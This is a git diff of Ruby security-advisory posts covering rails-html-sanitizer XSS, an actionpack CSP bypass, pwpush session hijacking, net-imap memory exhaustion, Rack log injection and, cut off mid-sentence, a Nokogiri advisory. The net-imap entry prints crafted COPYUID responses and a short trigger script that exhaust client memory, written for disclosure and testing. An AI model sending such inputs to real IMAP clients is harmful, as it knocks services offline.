-    - https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-rxv5-gxqc-xx8g
-    - https://github.com/rails/rails-html-sanitizer/commit/16251735e36ebdc302e2f90f2a39cad56879414f
-    - https://github.com/advisories/GHSA-rxv5-gxqc-xx8g
----
+---
+layout: advisory
+title: 'CVE-2024-53989 (rails-html-sanitizer): rails-html-sanitizer has XSS vulnerability
+  with certain configurations'
+comments: false
+categories:
+- rails-html-sanitizer
+- rails
+advisory:
+  gem: rails-html-sanitizer
+  framework: rails
+  cve: 2024-53989
+  ghsa: rxv5-gxqc-xx8g
+  url: https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-rxv5-gxqc-xx8g
+  title: rails-html-sanitizer has XSS vulnerability with certain configurations
+  date: 2024-12-02
+  description: |
+    ## Summary
+
+    There is a possible XSS vulnerability with certain configurations of
+    Rails::HTML::Sanitizer 1.6.0 when used with Rails >= 7.1.0.
+
+    * Versions affected: 1.6.0
+    * Not affected: < 1.6.0
+    * Fixed versions: 1.6.1
+
+    ## Impact
+
+    A possible XSS vulnerability with certain configurations of
+    Rails::HTML::Sanitizer may allow an attacker to inject content if
+    HTML5 sanitization is enabled and the application developer has
+    overridden the sanitizer's allowed tags in the following way:
+
+    - the "noscript" element is explicitly allowed
+
+    Code is only impacted if Rails is configured to use HTML5 sanitization,
+    please see documentation for [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
+    and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
+    for more information on these configuration options.
+
+    The default configuration is to disallow all of these elements. Code
+    is only impacted if allowed tags are being overridden. Applications
+    may be doing this in a few different ways:
+
+    1. using application configuration to configure Action View sanitizers'
+       allowed tags:
+
+      ```ruby
+      # In config/application.rb
+      config.action_view.sanitized_allowed_tags = ["noscript"]
+      ```
+
+      see https://guides.rubyonrails.org/configuring.html#configuring-action-view
+
+    2. using a `:tags` option to the Action View helper `sanitize`:
+
+      ```
+      <= sanitize @comment.body, tags: ["noscript"] >
+      ```
+
+      see https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-sanitize
+
+    3. setting Rails::HTML5::SafeListSanitizer class attribute `allowed_tags`:
+
+      ```ruby
+      # class-level option
+      Rails::HTML5::SafeListSanitizer.allowed_tags = ["noscript"]
+      ```
+
+      (note that this class may also be referenced as
+      `Rails::Html::SafeListSanitizer`)
+
+    4. using a `:tags` options to the Rails::HTML5::SafeListSanitizer instance method `sanitize`:
+
+      ```ruby
+      # instance-level option
+      Rails::HTML5::SafeListSanitizer.new.sanitize(@article.body, tags: ["noscript"])
+      ```
+
+      (note that this class may also be referenced as
+      `Rails::Html::SafeListSanitizer`)
+
+    5. setting ActionText::ContentHelper module attribute `allowed_tags`:
+
+      ```ruby
+      ActionText::ContentHelper.allowed_tags = ["noscript"]
+      ```
+
+    All users overriding the allowed tags by any of the above
+    mechanisms to include "noscript" should either upgrade or use
+    one of the workarounds.
+
+    ## Workarounds
+
+    Any one of the following actions will work around this issue:
+
+    - Remove "noscript" from the overridden allowed tags,
+    - Or, downgrade sanitization to HTML4 (see documentation for
+      [`config.action_view.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-view-sanitizer-vendor)
+      and [`config.action_text.sanitizer_vendor`](https://guides.rubyonrails.org/configuring.html#config-action-text-sanitizer-vendor)
+      for more information).
+
+    ## References
+
+    - [CWE - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (4.9)](https://cwe.mitre.org/data/definitions/79.html)
+    - Original report: https://hackerone.com/reports/2509647
+
+    ## Credit
+
+    This vulnerability was responsibly reported by HackerOne user
+    [@taise](https://hackerone.com/taise?type=user).
+  cvss_v4: 2.3
+  unaffected_versions:
+  - "< 1.6.0"
+  patched_versions:
+  - ">= 1.6.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-53989
+    - https://hackerone.com/reports/2931691
+    - https://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-rxv5-gxqc-xx8g
+    - https://github.com/rails/rails-html-sanitizer/commit/16251735e36ebdc302e2f90f2a39cad56879414f
+    - https://github.com/advisories/GHSA-rxv5-gxqc-xx8g
+---
diff --git a/advisories/_posts/2024-12-10-CVE-2024-54133.md b/advisories/_posts/2024-12-10-CVE-2024-54133.md
index 8136c3c5..df554606 100644
--- a/advisories/_posts/2024-12-10-CVE-2024-54133.md
+++ b/advisories/_posts/2024-12-10-CVE-2024-54133.md
@@ -1,55 +1,55 @@
----
-layout: advisory
-title: 'CVE-2024-54133 (actionpack): Possible Content Security Policy bypass in Action
-  Dispatch'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2024-54133
-  ghsa: vfm5-rmrh-j26v
-  url: https://github.com/rails/rails/security/advisories/GHSA-vfm5-rmrh-j26v
-  title: Possible Content Security Policy bypass in Action Dispatch
-  date: 2024-12-10
-  description: |
-    There is a possible Cross Site Scripting (XSS) vulnerability
-    in the `content_security_policy` helper in Action Pack.
-
-    ## Impact
-
-    Applications which set Content-Security-Policy (CSP) headers
-    dynamically from untrusted user input may be vulnerable to
-    carefully crafted inputs being able to inject new directives
-    into the CSP. This could lead to a bypass of the CSP and its
-    protection against XSS and other attacks.
-
-    ## Releases
-
-    The fixed releases are available at the normal locations.
-
-    ## Workarounds
-
-    Applications can avoid setting CSP headers dynamically from
-    untrusted input, or can validate/sanitize that input.
-
-    ## Credits
-
-    Thanks to [ryotak](https://hackerone.com/ryotak) for the report!
-  cvss_v4: 2.3
-  unaffected_versions:
-  - "< 5.2.0"
-  patched_versions:
-  - "~> 7.0.8, >= 7.0.8.7"
-  - "~> 7.1.5, >= 7.1.5.1"
-  - "~> 7.2.2, >= 7.2.2.1"
-  - ">= 8.0.0.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-54133
-    - https://hackerone.com/reports/2905532
-    - https://github.com/rails/rails/security/advisories/GHSA-vfm5-rmrh-j26v
-    - https://github.com/advisories/GHSA-vfm5-rmrh-j26v
----
+---
+layout: advisory
+title: 'CVE-2024-54133 (actionpack): Possible Content Security Policy bypass in Action
+  Dispatch'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2024-54133
+  ghsa: vfm5-rmrh-j26v
+  url: https://github.com/rails/rails/security/advisories/GHSA-vfm5-rmrh-j26v
+  title: Possible Content Security Policy bypass in Action Dispatch
+  date: 2024-12-10
+  description: |
+    There is a possible Cross Site Scripting (XSS) vulnerability
+    in the `content_security_policy` helper in Action Pack.
+
+    ## Impact
+
+    Applications which set Content-Security-Policy (CSP) headers
+    dynamically from untrusted user input may be vulnerable to
+    carefully crafted inputs being able to inject new directives
+    into the CSP. This could lead to a bypass of the CSP and its
+    protection against XSS and other attacks.
+
+    ## Releases
+
+    The fixed releases are available at the normal locations.
+
+    ## Workarounds
+
+    Applications can avoid setting CSP headers dynamically from
+    untrusted input, or can validate/sanitize that input.
+
+    ## Credits
+
+    Thanks to [ryotak](https://hackerone.com/ryotak) for the report!
+  cvss_v4: 2.3
+  unaffected_versions:
+  - "< 5.2.0"
+  patched_versions:
+  - "~> 7.0.8, >= 7.0.8.7"
+  - "~> 7.1.5, >= 7.1.5.1"
+  - "~> 7.2.2, >= 7.2.2.1"
+  - ">= 8.0.0.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-54133
+    - https://hackerone.com/reports/2905532
+    - https://github.com/rails/rails/security/advisories/GHSA-vfm5-rmrh-j26v
+    - https://github.com/advisories/GHSA-vfm5-rmrh-j26v
+---
diff --git a/advisories/_posts/2024-12-30-CVE-2024-56733.md b/advisories/_posts/2024-12-30-CVE-2024-56733.md
index 0c22830c..003a046d 100644
--- a/advisories/_posts/2024-12-30-CVE-2024-56733.md
+++ b/advisories/_posts/2024-12-30-CVE-2024-56733.md
@@ -1,82 +1,82 @@
----
-layout: advisory
-title: 'CVE-2024-56733 (pwpush): Password Pusher Allows Session Token Interception
-  Leading to Potential Hijacking'
-comments: false
-categories:
-- pwpush
-advisory:
-  gem: pwpush
-  cve: 2024-56733
-  ghsa: 4fwj-m62q-pp47
-  url: https://github.com/pglombardo/PasswordPusher/security/advisories/GHSA-4fwj-m62q-pp47
-  title: Password Pusher Allows Session Token Interception Leading to Potential Hijacking
-  date: 2024-12-30
-  description: |
-    ### Impact
-
-    A vulnerability has been reported in Password Pusher where an
-    attacker can copy the session cookie before a user logs out,
-    potentially allowing session hijacking.
-
-    Although the session token is replaced and invalidated upon logout,
-    if an attacker manages to capture the session cookie before this
-    process, they can use the token to gain unauthorized access to the
-    user's session until the token expires or is manually cleared.
-
-    This vulnerability hinges on the attacker's ability to access the
-    session cookie during an active session, either through a
-    man-in-the-middle attack, by exploiting another vulnerability like
-    XSS, or via direct access to the victim's device.
-
-    ### Patches
-
-    Although there is no direct resolution to this vulnerability, it is
-    recommended to always use the latest version of Password Pusher to
-    best mitigate risk.
-
-    ### Workarounds
-
-    If self-hosting, ensure Password Pusher is hosted exclusively over
-    SSL connections to encrypt traffic and prevent session cookies from
-    being intercepted in transit. Additionally, implement best practices
-    in local security to safeguard user systems, browsers, and data
-    against unauthorized access.
-
-    To further mitigate session hijacking risks, Password Pusher
-    implements the following security measures:
-
-    1. **Automatic Session Expiration**: Sessions are automatically
-       expired after 2 hours of inactivity, reducing the window for
-       potential exploitation.
-
-    2. **Session Reset on Login and Logout**: Sessions are fully reset
-       both when a user logs in and logs out, ensuring that session
-       tokens are not reusable post-logout. This practice invalidates
-       old session tokens and issues new ones, minimizing the risk of
-       session hijacking.
-
-    3. **Encrypted Cookies**: Cookies are encrypted using the value of
-       SECRET_KEY_BASE from the application's configuration. This
-       encryption adds a layer of protection against tampering or reading
-       the session cookie's contents if intercepted, although it doesn't
-       prevent the cookie from being used if stolen.
-
-    **Note**: While these measures significantly enhance security, they
-    are part of a broader security strategy.
-
-    ### References
-
-    * https://edgeguides.rubyonrails.org/security.html#session-hijacking
-
-    ### Credits
-
-    Thank you to [Positive Technologies](https://www.ptsecurity.com/ww-en/)
-    for reporting and working with me to bring this CVE to the community.
-  cvss_v3: 5.7
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-56733
-    - https://github.com/pglombardo/PasswordPusher/security/advisories/GHSA-4fwj-m62q-pp47
-    - https://github.com/advisories/GHSA-4fwj-m62q-pp47
----
+---
+layout: advisory
+title: 'CVE-2024-56733 (pwpush): Password Pusher Allows Session Token Interception
+  Leading to Potential Hijacking'
+comments: false
+categories:
+- pwpush
+advisory:
+  gem: pwpush
+  cve: 2024-56733
+  ghsa: 4fwj-m62q-pp47
+  url: https://github.com/pglombardo/PasswordPusher/security/advisories/GHSA-4fwj-m62q-pp47
+  title: Password Pusher Allows Session Token Interception Leading to Potential Hijacking
+  date: 2024-12-30
+  description: |
+    ### Impact
+
+    A vulnerability has been reported in Password Pusher where an
+    attacker can copy the session cookie before a user logs out,
+    potentially allowing session hijacking.
+
+    Although the session token is replaced and invalidated upon logout,
+    if an attacker manages to capture the session cookie before this
+    process, they can use the token to gain unauthorized access to the
+    user's session until the token expires or is manually cleared.
+
+    This vulnerability hinges on the attacker's ability to access the
+    session cookie during an active session, either through a
+    man-in-the-middle attack, by exploiting another vulnerability like
+    XSS, or via direct access to the victim's device.
+
+    ### Patches
+
+    Although there is no direct resolution to this vulnerability, it is
+    recommended to always use the latest version of Password Pusher to
+    best mitigate risk.
+
+    ### Workarounds
+
+    If self-hosting, ensure Password Pusher is hosted exclusively over
+    SSL connections to encrypt traffic and prevent session cookies from
+    being intercepted in transit. Additionally, implement best practices
+    in local security to safeguard user systems, browsers, and data
+    against unauthorized access.
+
+    To further mitigate session hijacking risks, Password Pusher
+    implements the following security measures:
+
+    1. **Automatic Session Expiration**: Sessions are automatically
+       expired after 2 hours of inactivity, reducing the window for
+       potential exploitation.
+
+    2. **Session Reset on Login and Logout**: Sessions are fully reset
+       both when a user logs in and logs out, ensuring that session
+       tokens are not reusable post-logout. This practice invalidates
+       old session tokens and issues new ones, minimizing the risk of
+       session hijacking.
+
+    3. **Encrypted Cookies**: Cookies are encrypted using the value of
+       SECRET_KEY_BASE from the application's configuration. This
+       encryption adds a layer of protection against tampering or reading
+       the session cookie's contents if intercepted, although it doesn't
+       prevent the cookie from being used if stolen.
+
+    **Note**: While these measures significantly enhance security, they
+    are part of a broader security strategy.
+
+    ### References
+
+    * https://edgeguides.rubyonrails.org/security.html#session-hijacking
+
+    ### Credits
+
+    Thank you to [Positive Technologies](https://www.ptsecurity.com/ww-en/)
+    for reporting and working with me to bring this CVE to the community.
+  cvss_v3: 5.7
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-56733
+    - https://github.com/pglombardo/PasswordPusher/security/advisories/GHSA-4fwj-m62q-pp47
+    - https://github.com/advisories/GHSA-4fwj-m62q-pp47
+---
diff --git a/advisories/_posts/2025-02-10-CVE-2025-25186.md b/advisories/_posts/2025-02-10-CVE-2025-25186.md
index b2362358..3762ce8f 100644
--- a/advisories/_posts/2025-02-10-CVE-2025-25186.md
+++ b/advisories/_posts/2025-02-10-CVE-2025-25186.md
@@ -1,166 +1,166 @@
----
-layout: advisory
-title: 'CVE-2025-25186 (net-imap): Possible DoS by memory exhaustion in net-imap'
-comments: false
-categories:
-- net-imap
-advisory:
-  gem: net-imap
-  cve: 2025-25186
-  ghsa: 7fc5-f82f-cx69
-  url: https://github.com/ruby/net-imap/security/advisories/GHSA-7fc5-f82f-cx69
-  title: Possible DoS by memory exhaustion in net-imap
-  date: 2025-02-10
-  description: |
-    ### Summary
-
-    There is a possibility for denial of service by memory exhaustion in
-    `net-imap`'s response parser.  At any time while the client is
-    connected, a malicious server can send  can send highly compressed
-    `uid-set` data which is automatically read by the client's receiver
-    thread.  The response parser uses `Range#to_a` to convert the
-    `uid-set` data into arrays of integers, with no limitation on the
-    expanded size of the ranges.
-
-    ### Details
-
-    IMAP's `uid-set` and `sequence-set` formats can compress ranges of
-    numbers, for example: `"1,2,3,4,5"` and `"1:5"` both represent the
-    same set.  When `Net::IMAP::ResponseParser` receives `APPENDUID` or
-    `COPYUID` response codes, it expands each `uid-set` into an array of
-    integers.  On a 64 bit system, these arrays will expand to 8 bytes
-    for each number in the set.  A malicious IMAP server may send
-    specially crafted `APPENDUID` or `COPYUID` responses with very large
-    `uid-set` ranges.
-
-    The `Net::IMAP` client parses each server response in a separate
-    thread, as soon as each responses is received from the server.
-    This attack works even when the client does not handle the
-    `APPENDUID` or `COPYUID` responses.
-
-    Malicious inputs:
-
-    ```ruby
-    # 40 bytes expands to ~1.6GB:
-    "* OK [COPYUID 1 1:99999999 1:99999999]\r\n"
-
-    # Worst *valid* input scenario (using uint32 max),
-    # 44 bytes expands to 64GiB:
-    "* OK [COPYUID 1 1:4294967295 1:4294967295]\r\n"
-
-    # Numbers must be non-zero uint32, but this isn't validated.  Arrays
-    # larger than UINT32_MAX can be created.  For example, the following
-    # would theoretically expand to almost 800 exabytes:
-    "* OK [COPYUID 1 1:99999999999999999999 1:99999999999999999999]\r\n"
-    ```
-
-    Simple way to test this:
-    ```ruby
-    require "net/imap"
-
-    def test(size)
-      input = "A004 OK [COPYUID 1 1:#{size} 1:#{size}] too large?\n"
-      parser = Net::IMAP::ResponseParser.new
-      parser.parse input
-    end
-
-    test(99_999_999)
-    ```
-
-    ### Fixes
-
-    #### Preferred Fix, minor API changes
-
-    Upgrade to v0.4.19, v0.5.6, or higher, and configure:
-
-    ```ruby
-    # globally
-    Net::IMAP.config.parser_use_deprecated_uidplus_data = false
-    # per-client
-    imap = Net::IMAP.new(hostname, ssl: true,
-                                   parser_use_deprecated_uidplus_data: false)
-    imap.config.parser_use_deprecated_uidplus_data = false
-    ```
-
-    This replaces `UIDPlusData` with `AppendUIDData` and `CopyUIDData`.
-    These classes store their UIDs as `Net::IMAP::SequenceSet` objects
-    (_not_ expanded into arrays of integers).  Code that does not handle
-    `APPENDUID` or `COPYUID` responses will not notice any difference.
-    Code that does handle these responses _may_ need to be updated.  See
-    the documentation for
-    [UIDPlusData](https://ruby.github.io/net-imap/Net/IMAP/UIDPlusData.html),
-    [AppendUIDData](https://ruby.github.io/net-imap/Net/IMAP/AppendUIDData.html)
-    and [CopyUIDData](https://ruby.github.io/net-imap/Net/IMAP/CopyUIDData.html).
-
-    For v0.3.8, this option is not available.
-    For v0.4.19, the default value is `true`.
-    For v0.5.6, the default value is `:up_to_max_size`.
-    For v0.6.0, the only allowed value will be `false`  _(`UIDPlusData`
-    will be removed from v0.6)_.
-
-    #### Mitigation, backward compatible API
-
-    Upgrade to v0.3.8, v0.4.19, v0.5.6, or higher.
-
-    For backward compatibility, `uid-set` can still be expanded
-    into an array, but a maximum limit will be applied.
-
-    Assign `config.parser_max_deprecated_uidplus_data_size` to set the
-    maximum `UIDPlusData` UID set size. When
-    `config.parser_use_deprecated_uidplus_data == true`, larger sets will crash.
-    When  `config.parser_use_deprecated_uidplus_data == :up_to_max_size`,
-    larger sets will use `AppendUIDData` or `CopyUIDData`.
-
-    For v0.3,8, this limit is _hard-coded_ to 10,000, and larger sets
-    will always raise `Net::IMAP::ResponseParseError`.
-    For v0.4.19, the limit defaults to 1000.
-    For v0.5.6, the limit defaults to 100.
-    For v0.6.0, the limit will be ignored  _(`UIDPlusData` will be
-    removed from v0.6)_.
-
-    #### Please Note: unhandled responses
-
-    If the client does not add response handlers to prune unhandled
-    responses, a malicious server can still eventually exhaust all
-
-    client memory, by repeatedly sending malicious responses.  However,
-    `net-imap` has always retained unhandled responses, and it has always
-    been necessary for long-lived connections to prune these responses.
-    _This is not significantly different from connecting to a trusted
-    server with a long-lived connection._  To limit the maximum number
-    of retained responses, a simple handler might look something like
-    the following:
-
-    ```ruby
-    limit = 1000
-    imap.add_response_handler do |resp|
-      next unless resp.respond_to?(:name) && resp.respond_to?(:data)
-      name = resp.name
-      code = resp.data.code&.name if resp.data.respond_to?(:code)
-      if Net::IMAP::VERSION > "0.4.0"
-        imap.responses(name) { _1.slice!(0...-limit) }
-        imap.responses(code) { _1.slice!(0...-limit) }
-      else
-        imap.responses(name).slice!(0...-limit)
-        imap.responses(code).slice!(0...-limit)
-      end
-    end
-    ```
-  cvss_v3: 6.5
-  unaffected_versions:
-  - "< 0.3.2"
-  patched_versions:
-  - "~> 0.3.8"
-  - "~> 0.4.19"
-  - ">= 0.5.6"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-25186
-    - https://www.ruby-lang.org/en/news/2025/02/10/dos-net-imap-cve-2025-25186
-    - https://github.com/ruby/net-imap/security/advisories/GHSA-7fc5-f82f-cx69
-    - https://github.com/ruby/net-imap/commit/70e3ddd071a94e450b3238570af482c296380b35
-    - https://github.com/ruby/net-imap/commit/c8c5a643739d2669f0c9a6bb9770d0c045fd74a3
-    - https://github.com/ruby/net-imap/commit/cb92191b1ddce2d978d01b56a0883b6ecf0b1022
-    - https://hackerone.com/reports/2987782
-    - https://github.com/advisories/GHSA-7fc5-f82f-cx69
----
+---
+layout: advisory
+title: 'CVE-2025-25186 (net-imap): Possible DoS by memory exhaustion in net-imap'
+comments: false
+categories:
+- net-imap
+advisory:
+  gem: net-imap
+  cve: 2025-25186
+  ghsa: 7fc5-f82f-cx69
+  url: https://github.com/ruby/net-imap/security/advisories/GHSA-7fc5-f82f-cx69
+  title: Possible DoS by memory exhaustion in net-imap
+  date: 2025-02-10
+  description: |
+    ### Summary
+
+    There is a possibility for denial of service by memory exhaustion in
+    `net-imap`'s response parser.  At any time while the client is
+    connected, a malicious server can send  can send highly compressed
+    `uid-set` data which is automatically read by the client's receiver
+    thread.  The response parser uses `Range#to_a` to convert the
+    `uid-set` data into arrays of integers, with no limitation on the
+    expanded size of the ranges.
+
+    ### Details
+
+    IMAP's `uid-set` and `sequence-set` formats can compress ranges of
+    numbers, for example: `"1,2,3,4,5"` and `"1:5"` both represent the
+    same set.  When `Net::IMAP::ResponseParser` receives `APPENDUID` or
+    `COPYUID` response codes, it expands each `uid-set` into an array of
+    integers.  On a 64 bit system, these arrays will expand to 8 bytes
+    for each number in the set.  A malicious IMAP server may send
+    specially crafted `APPENDUID` or `COPYUID` responses with very large
+    `uid-set` ranges.
+
+    The `Net::IMAP` client parses each server response in a separate
+    thread, as soon as each responses is received from the server.
+    This attack works even when the client does not handle the
+    `APPENDUID` or `COPYUID` responses.
+
+    Malicious inputs:
+
+    ```ruby
+    # 40 bytes expands to ~1.6GB:
+    "* OK [COPYUID 1 1:99999999 1:99999999]\r\n"
+
+    # Worst *valid* input scenario (using uint32 max),
+    # 44 bytes expands to 64GiB:
+    "* OK [COPYUID 1 1:4294967295 1:4294967295]\r\n"
+
+    # Numbers must be non-zero uint32, but this isn't validated.  Arrays
+    # larger than UINT32_MAX can be created.  For example, the following
+    # would theoretically expand to almost 800 exabytes:
+    "* OK [COPYUID 1 1:99999999999999999999 1:99999999999999999999]\r\n"
+    ```
+
+    Simple way to test this:
+    ```ruby
+    require "net/imap"
+
+    def test(size)
+      input = "A004 OK [COPYUID 1 1:#{size} 1:#{size}] too large?\n"
+      parser = Net::IMAP::ResponseParser.new
+      parser.parse input
+    end
+
+    test(99_999_999)
+    ```
+
+    ### Fixes
+
+    #### Preferred Fix, minor API changes
+
+    Upgrade to v0.4.19, v0.5.6, or higher, and configure:
+
+    ```ruby
+    # globally
+    Net::IMAP.config.parser_use_deprecated_uidplus_data = false
+    # per-client
+    imap = Net::IMAP.new(hostname, ssl: true,
+                                   parser_use_deprecated_uidplus_data: false)
+    imap.config.parser_use_deprecated_uidplus_data = false
+    ```
+
+    This replaces `UIDPlusData` with `AppendUIDData` and `CopyUIDData`.
+    These classes store their UIDs as `Net::IMAP::SequenceSet` objects
+    (_not_ expanded into arrays of integers).  Code that does not handle
+    `APPENDUID` or `COPYUID` responses will not notice any difference.
+    Code that does handle these responses _may_ need to be updated.  See
+    the documentation for
+    [UIDPlusData](https://ruby.github.io/net-imap/Net/IMAP/UIDPlusData.html),
+    [AppendUIDData](https://ruby.github.io/net-imap/Net/IMAP/AppendUIDData.html)
+    and [CopyUIDData](https://ruby.github.io/net-imap/Net/IMAP/CopyUIDData.html).
+
+    For v0.3.8, this option is not available.
+    For v0.4.19, the default value is `true`.
+    For v0.5.6, the default value is `:up_to_max_size`.
+    For v0.6.0, the only allowed value will be `false`  _(`UIDPlusData`
+    will be removed from v0.6)_.
+
+    #### Mitigation, backward compatible API
+
+    Upgrade to v0.3.8, v0.4.19, v0.5.6, or higher.
+
+    For backward compatibility, `uid-set` can still be expanded
+    into an array, but a maximum limit will be applied.
+
+    Assign `config.parser_max_deprecated_uidplus_data_size` to set the
+    maximum `UIDPlusData` UID set size. When
+    `config.parser_use_deprecated_uidplus_data == true`, larger sets will crash.
+    When  `config.parser_use_deprecated_uidplus_data == :up_to_max_size`,
+    larger sets will use `AppendUIDData` or `CopyUIDData`.
+
+    For v0.3,8, this limit is _hard-coded_ to 10,000, and larger sets
+    will always raise `Net::IMAP::ResponseParseError`.
+    For v0.4.19, the limit defaults to 1000.
+    For v0.5.6, the limit defaults to 100.
+    For v0.6.0, the limit will be ignored  _(`UIDPlusData` will be
+    removed from v0.6)_.
+
+    #### Please Note: unhandled responses
+
+    If the client does not add response handlers to prune unhandled
+    responses, a malicious server can still eventually exhaust all
+
+    client memory, by repeatedly sending malicious responses.  However,
+    `net-imap` has always retained unhandled responses, and it has always
+    been necessary for long-lived connections to prune these responses.
+    _This is not significantly different from connecting to a trusted
+    server with a long-lived connection._  To limit the maximum number
+    of retained responses, a simple handler might look something like
+    the following:
+
+    ```ruby
+    limit = 1000
+    imap.add_response_handler do |resp|
+      next unless resp.respond_to?(:name) && resp.respond_to?(:data)
+      name = resp.name
+      code = resp.data.code&.name if resp.data.respond_to?(:code)
+      if Net::IMAP::VERSION > "0.4.0"
+        imap.responses(name) { _1.slice!(0...-limit) }
+        imap.responses(code) { _1.slice!(0...-limit) }
+      else
+        imap.responses(name).slice!(0...-limit)
+        imap.responses(code).slice!(0...-limit)
+      end
+    end
+    ```
+  cvss_v3: 6.5
+  unaffected_versions:
+  - "< 0.3.2"
+  patched_versions:
+  - "~> 0.3.8"
+  - "~> 0.4.19"
+  - ">= 0.5.6"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-25186
+    - https://www.ruby-lang.org/en/news/2025/02/10/dos-net-imap-cve-2025-25186
+    - https://github.com/ruby/net-imap/security/advisories/GHSA-7fc5-f82f-cx69
+    - https://github.com/ruby/net-imap/commit/70e3ddd071a94e450b3238570af482c296380b35
+    - https://github.com/ruby/net-imap/commit/c8c5a643739d2669f0c9a6bb9770d0c045fd74a3
+    - https://github.com/ruby/net-imap/commit/cb92191b1ddce2d978d01b56a0883b6ecf0b1022
+    - https://hackerone.com/reports/2987782
+    - https://github.com/advisories/GHSA-7fc5-f82f-cx69
+---
diff --git a/advisories/_posts/2025-02-12-CVE-2025-25184.md b/advisories/_posts/2025-02-12-CVE-2025-25184.md
index 7b26b62c..6f99240a 100644
--- a/advisories/_posts/2025-02-12-CVE-2025-25184.md
+++ b/advisories/_posts/2025-02-12-CVE-2025-25184.md
@@ -1,56 +1,56 @@
----
-layout: advisory
-title: 'CVE-2025-25184 (rack): Possible Log Injection in Rack::CommonLogger'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2025-25184
-  ghsa: 7g2v-jj9q-g3rg
-  url: https://github.com/rack/rack/security/advisories/GHSA-7g2v-jj9q-g3rg
-  title: Possible Log Injection in Rack::CommonLogger
-  date: 2025-02-12
-  description: |
-    ## Summary
-
-    `Rack::CommonLogger` can be exploited by crafting input that includes
-    newline characters to manipulate log entries. The supplied
-    proof-of-concept demonstrates injecting malicious content into logs.
-
-    ## Details
-
-    When a user provides the authorization credentials via
-    `Rack::Auth::Basic`, if success, the username will be put in
-    `env['REMOTE_USER']` and later be used by `Rack::CommonLogger`
-    for logging purposes.
-
-    The issue occurs when a server intentionally or unintentionally
-    allows a user creation with the username contain CRLF and white
-    space characters, or the server just want to log every login
-    attempts. If an attacker enters a username with CRLF character,
-    the logger will log the malicious username with CRLF characters
-    into the logfile.
-
-    ## Impact
-
-    Attackers can break log formats or insert fraudulent entries,
-    potentially obscuring real activity or injecting malicious data
-    into log files.
-
-    ## Mitigation
-
-    - Update to the latest version of Rack.
-  cvss_v3: 6.5
-  cvss_v4: 5.7
-  patched_versions:
-  - "~> 2.2.11"
-  - "~> 3.0.12"
-  - ">= 3.1.10"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-25184
-    - https://github.com/rack/rack/security/advisories/GHSA-7g2v-jj9q-g3rg
-    - https://github.com/rack/rack/commit/074ae244430cda05c27ca91cda699709cfb3ad8e
-    - https://github.com/advisories/GHSA-7g2v-jj9q-g3rg
----
+---
+layout: advisory
+title: 'CVE-2025-25184 (rack): Possible Log Injection in Rack::CommonLogger'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2025-25184
+  ghsa: 7g2v-jj9q-g3rg
+  url: https://github.com/rack/rack/security/advisories/GHSA-7g2v-jj9q-g3rg
+  title: Possible Log Injection in Rack::CommonLogger
+  date: 2025-02-12
+  description: |
+    ## Summary
+
+    `Rack::CommonLogger` can be exploited by crafting input that includes
+    newline characters to manipulate log entries. The supplied
+    proof-of-concept demonstrates injecting malicious content into logs.
+
+    ## Details
+
+    When a user provides the authorization credentials via
+    `Rack::Auth::Basic`, if success, the username will be put in
+    `env['REMOTE_USER']` and later be used by `Rack::CommonLogger`
+    for logging purposes.
+
+    The issue occurs when a server intentionally or unintentionally
+    allows a user creation with the username contain CRLF and white
+    space characters, or the server just want to log every login
+    attempts. If an attacker enters a username with CRLF character,
+    the logger will log the malicious username with CRLF characters
+    into the logfile.
+
+    ## Impact
+
+    Attackers can break log formats or insert fraudulent entries,
+    potentially obscuring real activity or injecting malicious data
+    into log files.
+
+    ## Mitigation
+
+    - Update to the latest version of Rack.
+  cvss_v3: 6.5
+  cvss_v4: 5.7
+  patched_versions:
+  - "~> 2.2.11"
+  - "~> 3.0.12"
+  - ">= 3.1.10"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-25184
+    - https://github.com/rack/rack/security/advisories/GHSA-7g2v-jj9q-g3rg
+    - https://github.com/rack/rack/commit/074ae244430cda05c27ca91cda699709cfb3ad8e
+    - https://github.com/advisories/GHSA-7g2v-jj9q-g3rg
+---
diff --git a/advisories/_posts/2025-02-18-GHSA-vvfq-8hwr-qm4m.md b/advisories/_posts/2025-02-18-GHSA-vvfq-8hwr-qm4m.md
index bb5e9d3a..93b4ae8e 100644
--- a/advisories/_posts/2025-02-18-GHSA-vvfq-8hwr-qm4m.md
+++ b/advisories/_posts/2025-02-18-GHSA-vvfq-8hwr-qm4m.md
@@ -1,47 +1,47 @@
----
-layout: advisory
-title: 'GHSA-vvfq-8hwr-qm4m (nokogiri): Nokogiri updates packaged libxml2 to 2.13.6
-  to resolve CVE-2025-24928 and CVE-2024-56171'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  ghsa: vvfq-8hwr-qm4m
-  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-vvfq-8hwr-qm4m
-  title: Nokogiri updates packaged libxml2 to 2.13.6 to resolve CVE-2025-24928 and
-    CVE-2024-56171
-  date: 2025-02-18
-  description: |
-    ## Summary
-
-    Nokogiri v1.18.3 upgrades its dependency libxml2 to
